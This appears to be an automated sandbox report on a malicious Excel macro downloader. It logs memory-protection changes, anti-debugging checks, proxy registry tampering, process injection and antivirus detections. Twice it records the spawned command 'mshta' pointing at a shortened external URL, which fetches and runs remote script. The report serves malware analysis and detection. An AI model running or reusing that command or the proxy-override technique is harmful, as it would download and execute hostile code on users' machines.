BHBW-P412536.xls

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 2, 2021, 6:15 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (11 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 2, 2021, 6:14 p.m.	process_identifier: 1960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6b553000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 2, 2021, 6:15 p.m.	process_identifier: 1960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0765f000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 2, 2021, 6:15 p.m.	process_identifier: 1960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0765f000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 2, 2021, 6:15 p.m.	process_identifier: 1960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c0000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 2, 2021, 6:15 p.m.	process_identifier: 1960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c0000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 2, 2021, 6:15 p.m.	process_identifier: 1960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c0000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 2, 2021, 6:15 p.m.	process_identifier: 1960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c0000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 2, 2021, 6:15 p.m.	process_identifier: 1960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c0000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 2, 2021, 6:15 p.m.	process_identifier: 1960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c0000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 2, 2021, 6:15 p.m.	process_identifier: 2848 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x709f2000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 2, 2021, 6:15 p.m.	process_identifier: 2848 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6b553000 process_handle: 0xffffffff	1	0	0

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$BHBW-P412536.xls

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile Sept. 2, 2021, 6:14 p.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x00000414 filepath: C:\Users\test22\AppData\Local\Temp\~$BHBW-P412536.xls desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$BHBW-P412536.xls create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1	0	0

Creates a suspicious process (2 events)

cmdline	mshta https://www.bitly.com/ewrhteraewkjsi
cmdline	"C:\Windows\System32\mshta.exe" https://www.bitly.com/ewrhteraewkjsi

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 2, 2021, 6:15 p.m.	process_identifier: 2848 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Yara rule detected in process memory (8 events)

description	(no description)				rule	DebuggerCheck__GlobalFlags
description	(no description)				rule	DebuggerCheck__QueryInfo
description	(no description)				rule	DebuggerHiding__Thread
description	(no description)				rule	DebuggerHiding__Active
description	(no description)				rule	ThreadControl__Context
description	(no description)				rule	SEH__vectored
description	Checks if being debugged				rule	anti_dbg
description	Bypass DEP				rule	disable_dep

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Sept. 2, 2021, 6:15 p.m.	key_handle: 0x000002a0 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Modifies proxy override settings possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Sept. 2, 2021, 6:15 p.m.	key_handle: 0x000002a0 regkey_r: ProxyOverride reg_type: 1 (REG_SZ) value: 127.0.0.1:16107; regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride	1	0	0

One or more non-whitelisted processes were created (2 events)

parent_process	excel.exe				martian_process	mshta https://www.bitly.com/ewrhteraewkjsi
parent_process	excel.exe				martian_process	"C:\Windows\System32\mshta.exe" https://www.bitly.com/ewrhteraewkjsi

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Process injection	Process 1960 resumed a thread in remote process 2848
Time & API	Arguments	Status	Return	Repeated
NtResumeThread Sept. 2, 2021, 6:15 p.m.	thread_handle: 0x00000608 suspend_count: 1 process_identifier: 2848	1	0	0

File has been identified by 26 AntiVirus engines on VirusTotal as malicious (26 events)

Lionic	Trojan.Script.Generic.a!c
Elastic	malicious (high confidence)
Alibaba	TrojanDownloader:Office97/Powdow.83d3d90c
Cyren	PP97M/Agent.ACM.gen!Eldorado
Symantec	Trojan.Mdropper
ESET-NOD32	a variant of Generik.LIMOBDO
Avast	Script:SNH-gen [Trj]
Cynet	Malicious (score: 99)
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Trojan.GenericKD.37519231
NANO-Antivirus	Trojan.Ole2.Vbs-heuristic.druvzi
MicroWorld-eScan	Trojan.GenericKD.37519231
Ad-Aware	Trojan.GenericKD.37519231
McAfee-GW-Edition	W97M/Downloader.drf
FireEye	Trojan.GenericKD.37519231
Emsisoft	Trojan.GenericKD.37519231 (B)
SentinelOne	Static AI - Suspicious OPENXML
GData	Macro.Trojan.Agent.RR1MOO
Avira	HEUR/Macro.Downloader.MRKI.Gen
Microsoft	TrojanDownloader:O97M/Powdow.RVO!MTB
ZoneAlarm	HEUR:Trojan-Downloader.Script.Generic
McAfee	W97M/Downloader.drf
MAX	malware (ai score=87)
Ikarus	Trojan-Downloader.VBA.Agent
Fortinet	VBA/Agent.F37B!tr
AVG	Script:SNH-gen [Trj]

The process excel.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\mshta.exe